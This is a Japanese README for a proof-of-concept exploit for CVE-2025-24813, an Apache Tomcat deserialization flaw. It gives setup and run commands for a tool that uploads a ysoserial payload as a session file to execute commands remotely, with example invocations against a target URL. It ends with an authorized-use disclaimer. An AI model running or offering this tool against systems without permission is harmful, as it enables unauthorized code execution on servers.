
Apache TomcatのJavaデシリアライゼーション脆弱性であるCVE-2025-24813の概念実証エクスプロイト。悪意のあるシリアライズペイロードを生成し、セッションファイルとしてアップロードしてリモートコード実行をトリガーする。
このリポジトリには、Apache Tomcat の Java デシリアライゼーション脆弱性である CVE-2025-24813 用の概念実証(PoC)エクスプロイトが含まれています。
以下に基づいています: absholi7ly/POC-CVE-2025-24813/。
依存関係をインストールします:
uv venv
source .venv/bin/activate
uv sync
ysoserial をダウンロードします:
./download.sh
コンテナ内でエクスプロイトをビルドして実行します:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
エクスプロイトを直接実行します:
python main.py <target_url> [options]
--command: 実行するコマンド(デフォルト: calc.exe)--ysoserial: ysoserial.jar へのパス(デフォルト: ./ysoserial-all.jar)--gadget: ysoserial ガジェットチェーン(デフォルト: CommonsCollections6)--payload_type: ペイロードタイプ - ysoserial または java(デフォルト: ysoserial)--no-ssl-verify: SSL 検証を無効にする# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
このツールは教育目的および許可されたテスト目的のみで使用してください。所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。